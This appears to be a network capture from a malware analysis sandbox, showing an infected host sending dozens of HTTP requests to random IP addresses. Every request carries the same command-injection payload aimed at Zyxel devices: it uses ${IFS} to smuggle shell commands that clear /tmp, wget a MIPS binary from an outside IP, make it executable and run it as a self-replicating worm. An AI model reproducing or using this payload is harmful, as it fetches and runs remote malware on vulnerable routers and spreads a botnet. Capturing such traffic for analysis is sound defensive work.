                                                Jan 28, 2024 10:16:43.085381985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9041192.168.2.235340440.144.234.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085438013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9042192.168.2.23558429.184.99.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085464954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9043192.168.2.2358858176.100.253.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085469007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9044192.168.2.2332988216.117.82.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085515976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9045192.168.2.23536545.48.108.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085552931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9046192.168.2.2349892177.14.11.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085573912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9047192.168.2.235759427.10.124.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085587978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9048192.168.2.2344284106.242.124.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085613012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9049192.168.2.23511922.49.6.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085642099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9050192.168.2.2344268164.131.27.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085664034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9051192.168.2.2342804193.250.84.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085701942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9052192.168.2.235193096.150.241.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085733891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9053192.168.2.2335250134.123.199.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085758924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9054192.168.2.2343288187.76.230.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085792065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9055192.168.2.234388614.241.220.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085800886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9056192.168.2.2340614150.0.94.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085829973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9057192.168.2.236049262.207.199.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085836887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9058192.168.2.2355662107.154.5.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085839987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9059192.168.2.2345726156.103.61.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085875988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9060192.168.2.234085266.245.86.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085901022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9061192.168.2.234166872.132.78.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085941076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9062192.168.2.2342586219.29.121.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085985899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9063192.168.2.2338520188.44.2.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.085995913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9064192.168.2.234699688.91.76.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086025953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9065192.168.2.234618096.14.180.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086049080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9066192.168.2.233892850.40.251.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086076975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9067192.168.2.2356056131.22.87.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086103916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9068192.168.2.235779071.46.79.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086129904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9069192.168.2.235382466.220.218.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086178064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9070192.168.2.2337720153.24.123.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086188078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9071192.168.2.2346834169.221.141.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086215973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9072192.168.2.2338530188.154.230.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086231947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9073192.168.2.2347364212.224.183.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086251974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9074192.168.2.2352270153.246.43.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086287022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9075192.168.2.235347082.138.80.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086311102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9076192.168.2.2338276166.194.29.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086340904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9077192.168.2.2350946194.200.191.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086369038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9078192.168.2.2343150207.79.254.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086390972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9079192.168.2.2357218151.26.25.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086422920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9080192.168.2.234561884.61.167.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086460114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9081192.168.2.235339277.27.138.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086461067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9082192.168.2.2351092221.154.135.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086486101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9083192.168.2.235742242.16.247.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086518049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9084192.168.2.2346218124.186.139.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086534023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9085192.168.2.2357840170.236.2.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086558104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9086192.168.2.2338218150.104.218.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086596966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9087192.168.2.2350088176.103.201.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086605072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9088192.168.2.2349594103.209.84.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086617947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9089192.168.2.2346006142.149.9.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086658001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9090192.168.2.2358438154.255.96.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086677074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9091192.168.2.2355118110.113.155.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086694002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9092192.168.2.2347474176.34.209.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086738110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9093192.168.2.234027650.191.27.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086786032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9094192.168.2.2343114155.82.78.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086796999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9095192.168.2.2347102156.117.206.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086802959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9096192.168.2.2355048141.49.24.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086847067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9097192.168.2.234380847.245.76.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086868048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9098192.168.2.2350956139.14.168.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086899996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9099192.168.2.2360718109.89.165.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086925030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9100192.168.2.2344940125.232.134.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086970091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9101192.168.2.23450344.31.47.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:43.086992979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9102192.168.2.2358700126.220.79.74443
                                                TimestampBytes transferredDirectionData
